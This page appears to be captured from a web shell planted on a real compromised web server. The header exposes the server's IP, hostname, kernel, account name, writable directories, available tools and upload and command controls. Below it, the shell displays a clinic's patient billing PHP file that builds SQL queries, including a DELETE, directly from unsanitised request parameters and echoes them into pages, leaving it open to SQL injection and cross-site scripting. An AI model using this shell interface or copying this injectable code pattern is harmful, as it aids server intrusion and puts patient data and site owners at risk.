Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 3.15.12.34
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/www/login.easenup.in/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME ]     

Current File : /home/btiyawmy/www/login.easenup.in//ProcedureCharges.php
 <!-- /.card-header -->
            
                <table class="table table-bordered table-hover">
               
                  <tr>
             <th><strong>Date & Time <br>Towards </strong></th>
          <th><strong>Procedure fees <br> & Status</strong></th>
            <th><strong>Assisted by </strong></th>
       <th><strong><section class="content-header">Action</section> </strong></th>             
        </tr>
      
            
<?php
include("dbconnection.php");
if(isset($_GET['invoiceid']))
{
	$patient_invoice=$con->query("DELETE FROM patient_invace WHERE invaceid='".$_GET['invoiceid']."'");
if($patient_invoice==1){
echo "<script>alert('Delete successfully..');</script>";
echo "<script>window.location='billingset.php?prescriptionid=$_GET[prescriptionid]&patientid=$_GET[patientid]'</script>";
}
}
$treatmentArray=array();

    	$sql ="SELECT * FROM surgerytracker WHERE prescriptionid='$_GET[prescriptionid]' AND patientid='$_GET[patientid]'";
    		$qsql = mysqli_query($con,$sql);
    		while($re = mysqli_fetch_array($qsql))
    		{
                $sql1 ="SELECT * FROM list_tretment WHERE trid='$re[surgery]'";
            	$qsql1 = mysqli_query($con,$sql1);
            	while($re1 = mysqli_fetch_array($qsql1))
            	{
            	    $treatmentArray[$re[surgery]]=$re1['tratment'];
            	}
            }

$sql ="SELECT * FROM addaspatient WHERE patientid='$_GET[patientid]' AND prescriptionid='$_GET[prescriptionid]'";
$qsql = mysqli_query($con,$sql);
if($rs = mysqli_fetch_array($qsql))
{
	$sqlpatient = "SELECT * FROM patient_invace WHERE prescriptionid='$rs[prescriptionid]' AND 	discription='surgury_fees'";
	$qsqlpatient = mysqli_query($con,$sqlpatient);
	while($rsp = mysqli_fetch_array($qsqlpatient))
	{
	$sqlpatient1 = "SELECT * FROM site_users WHERE userno='$rs[entered_by]'";
	$qsqlpatient1 = mysqli_query($con,$sqlpatient1);
	while($rsn = mysqli_fetch_array($qsqlpatient1))
	{
	    $treatmentName=(!empty($treatmentArray) && $treatmentArray[$rsp[pagetype]])?$treatmentArray[$rsp[pagetype]]:"";
	    $pricedue=$rsp[pricetotal];
            echo " <tbody>
            <tr>   <td>&nbsp;$rsp[created_at] <br>$rsp[discription] <br> $treatmentName</td>
              		<td>&nbsp;$rsp[pricetotal] <br>
              			";
              			$usertype=$rsp['status'];
              			

if($usertype == 'Paid'){
    echo "Paid";
} else{
    echo "Due <b>$pricedue</b>";
}echo "</td>
              		 <td>&nbsp;$rsn[name]</td>
              						<td><section class='content-header'><a href='$rsp[link]&treatmentName=$treatmentName' ><i class='fa fa-eye' aria-hidden='true' style='font-size:20px;'></i> 
</a>"; ?>
              					<a  href='billingset.php?invoiceid=$rsp[invaceid]&prescriptionid=$_GET[prescriptionid]&patientid=$_GET[patientid]' onclick="return confirm('Are you sure?')">
              						 <i class='fa fa-trash-o' aria-hidden='true' style='font-size:20px;color:#b30808; margin-left:5px;'></i>

 <?php echo "
</a> </td>
          </tr>  ";                 
      
        
          
}
}
}

              	
?>
        </table>
        <br>
    <a href="#">

Anon7 - 2022
AnonSec Team